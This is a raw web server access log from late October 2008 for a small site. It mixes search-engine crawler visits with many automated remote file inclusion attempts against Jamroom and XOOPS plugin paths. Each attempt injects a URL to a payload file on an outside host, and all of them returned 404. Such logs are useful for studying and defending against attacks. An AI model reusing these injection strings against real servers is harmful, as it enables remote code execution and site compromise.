216.158.1.198 - - [30/Oct/2008:17:21:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [30/Oct/2008:17:21:08 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
69.64.49.177 - - [30/Oct/2008:17:44:03 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
69.64.49.177 - - [30/Oct/2008:18:16:40 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
69.64.49.177 - - [30/Oct/2008:18:16:40 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
69.64.49.177 - - [30/Oct/2008:18:16:40 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
74.6.17.169 - - [30/Oct/2008:18:50:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.17.169 - - [30/Oct/2008:18:50:37 -0700] "GET /_private/?S=D HTTP/1.0" 200 514 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
66.249.71.80 - - [30/Oct/2008:18:50:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [30/Oct/2008:18:50:54 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [30/Oct/2008:18:50:54 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
208.80.194.37 - - [30/Oct/2008:20:30:06 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" "autobutlerlifts.com"
24.67.0.44 - - [30/Oct/2008:20:46:16 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
67.195.37.116 - - [30/Oct/2008:20:57:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
154.5.252.194 - - [30/Oct/2008:21:21:42 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
154.5.252.194 - - [30/Oct/2008:21:21:42 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
154.5.252.194 - - [30/Oct/2008:21:21:42 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.82 - - [30/Oct/2008:21:52:44 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [30/Oct/2008:21:52:44 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
72.30.87.105 - - [30/Oct/2008:21:58:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
72.30.87.105 - - [30/Oct/2008:21:59:01 -0700] "GET /logs/?D=A HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "autobutlerlifts.com"
216.158.1.198 - - [30/Oct/2008:23:26:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [30/Oct/2008:23:26:21 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
82.78.216.197 - - [30/Oct/2008:23:37:19 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.autobutlerlifts.com"
82.78.216.197 - - [30/Oct/2008:23:37:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.autobutlerlifts.com"
82.78.216.197 - - [30/Oct/2008:23:37:19 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:00:06:24 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
72.9.247.34 - - [31/Oct/2008:00:18:27 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
72.9.247.34 - - [31/Oct/2008:00:18:27 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
72.9.247.34 - - [31/Oct/2008:00:18:27 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:00:26:10 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:00:27:44 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:43:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:43:49 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:43:49 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:44:14 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:44:14 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.185.237.47 - - [31/Oct/2008:01:44:14 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:03:43:47 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:03:43:47 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.22.151 - - [31/Oct/2008:03:55:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.22.151 - - [31/Oct/2008:03:55:55 -0700] "GET /_private/?D=A HTTP/1.0" 200 514 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
208.80.194.26 - - [31/Oct/2008:06:39:09 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {678FB63C-DED2-9413-29FC-9BEE4E3A9812}; (R1 1.5); .NET CLR 2.0.50727)" "www.autobutlerlifts.com"
74.6.22.151 - - [31/Oct/2008:06:53:13 -0700] "GET /logs/?S=D HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
218.38.18.31 - - [31/Oct/2008:07:03:45 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://85.159.65.83:32000/accounts/inc/blini.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.autobutlerlifts.com"
218.38.18.31 - - [31/Oct/2008:07:03:46 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://85.159.65.83:32000/accounts/inc/blini.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.autobutlerlifts.com"
64.1.215.164 - - [31/Oct/2008:07:22:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:07:36:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:07:36:32 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:07:42:17 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:07:51:27 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:07:52:41 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:08:47:15 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
71.136.56.245 - - [31/Oct/2008:08:56:36 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://byteh4ck.xail.net/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
71.136.56.245 - - [31/Oct/2008:08:56:37 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://byteh4ck.xail.net/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
71.136.56.245 - - [31/Oct/2008:08:56:37 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://byteh4ck.xail.net/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
70.86.11.235 - - [31/Oct/2008:09:11:26 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
70.86.11.235 - - [31/Oct/2008:09:47:36 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
70.86.11.235 - - [31/Oct/2008:09:47:36 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.autobutlerlifts.com"
64.1.215.162 - - [31/Oct/2008:10:01:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:25:47 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:25:47 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:25:47 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
70.38.38.230 - - [31/Oct/2008:10:28:06 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kungfuclasicounion.es/Foro/cache/testid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.autobutlerlifts.com"
70.38.38.230 - - [31/Oct/2008:10:28:10 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kungfuclasicounion.es/Foro/cache/testid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.autobutlerlifts.com"
70.38.38.230 - - [31/Oct/2008:10:28:10 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kungfuclasicounion.es/Foro/cache/testid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:06 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:06 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:06 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:24 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.autobutlerlifts.com"
140.130.101.5 - - [31/Oct/2008:10:31:28 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:14 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:17 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:17 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:17 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:30 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.asa-auto.ba/mambo/cache/v6id.txt?%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.asa-auto.ba/mambo/cache/v6id.txt?%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:31 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.asa-auto.ba/mambo/cache/v6id.txt?%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:55 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:55 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:32:55 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:36:18 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:36:18 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
203.146.15.54 - - [31/Oct/2008:10:36:18 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.autobutlerlifts.com"
208.83.106.201 - - [31/Oct/2008:10:36:34 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.autobutlerlifts.com"
208.83.106.201 - - [31/Oct/2008:10:36:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.autobutlerlifts.com"
208.83.106.201 - - [31/Oct/2008:10:36:37 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:10:54:40 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [31/Oct/2008:10:54:40 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
80.67.23.90 - - [31/Oct/2008:11:30:11 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
80.67.23.90 - - [31/Oct/2008:11:30:11 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
80.67.23.90 - - [31/Oct/2008:11:30:11 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:11:51:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:11:51:53 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
216.158.1.198 - - [31/Oct/2008:12:22:31 -0700] "GET /logs/access_070701.log HTTP/1.0" 200 22361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0/1.0 (bot; http://; bot@bot.com)" "autobutlerlifts.com"
89.111.176.122 - - [31/Oct/2008:12:22:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
89.111.176.122 - - [31/Oct/2008:12:22:34 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
89.111.176.122 - - [31/Oct/2008:12:22:34 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
66.249.71.41 - - [31/Oct/2008:12:24:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.39 - - [31/Oct/2008:12:24:53 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "autobutlerlifts.com"
66.249.71.82 - - [31/Oct/2008:14:07:33 -0700] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [31/Oct/2008:14:07:33 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
